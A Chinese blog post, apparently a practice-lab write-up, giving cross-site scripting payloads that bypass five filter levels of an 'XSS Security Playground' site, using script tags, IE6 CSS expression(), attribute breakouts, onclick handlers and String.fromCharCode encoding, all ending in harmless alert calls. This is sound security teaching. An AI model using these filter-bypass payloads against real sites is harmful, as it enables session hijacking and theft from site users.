正在阅读:

XSS绕过小练习

18,741

最近在整理收藏夹,发现了一个关于XSS绕过的网站,以前没有怎么关注,今天看到了就测试了一下,共有5个小案例,都是比较简单的,绕过方法分享给大家。

XSS绕过案例网站:

XSS Security Playground

共有5个小题目,每个小题目都有一些限制条件。


1、No security. Everything goes.
2、Personalized CSS. no html symbols allowed.
3、Html escaped. Image,avatar,etc url form.
4、 Nothing is escaped.. but some keywords are stripped.
5、Poor addslashes security.

XSS绕过小案例

1、Form One -- No security. Everything goes.

无安全方面的限制,直接使用

<script>alert(/waitalone.cn/);</script>

即可绕过

过关攻略1

2、Form Two -- Personalized CSS. no html symbols allowed.

限制条件:只能使用CSS,不允许使用html标签

我们知道利用expression可以用来构造XSS,但是只能在IE下面测试,所以下面的测试请在IE6中执行。

body {
background:black;
xss:expression(alert(/waitalone.cn/));/*IE6下测试*/
}

过关攻略2

3、Form Three -- Html escaped. Image,avatar,etc url form.

限制条件:对HTML进行了转义,Image标签可用。

测试输入的字符会被插入到src地址中,那么可以使用伪协议来绕过。

直接输入

javascript:alert(/waitalone.cn/);

即可绕过 //IE6下

过关攻略3

或者你也可以使用事件来绕过,注意闭合语句即可,如下:

1" onerror=alert(/waitalone.cn/); var a="1

过关攻略3

4、Form Four -- Nothing is escaped.. but some keywords are stripped.

限制条件:使用了关键字过滤。

我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,但是onclick未过滤,使用onclick事件绕过

<img src=# onclick=alert(/waitalone.cn/);>

IE6下测试

过关攻略4

5、Form Five -- Poor addslashes security.

限制条件:使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号,双引号等等特征字符。

直接使用

<script>alert(/waitalone.cn/);</script>

即可绕过

过关攻略5

或者使用String.fromCharCode方法,如下:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,119,97,105,116,97,108,111,110,101,46,99,110,47,41,59));</script>

过关攻略5

目前有:2条访客评论

  1. test
    2015-05-09 15:23

    很不错学习了很多 谢谢

  2. 1234
    2017-12-11 03:06

    谢谢>_<

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌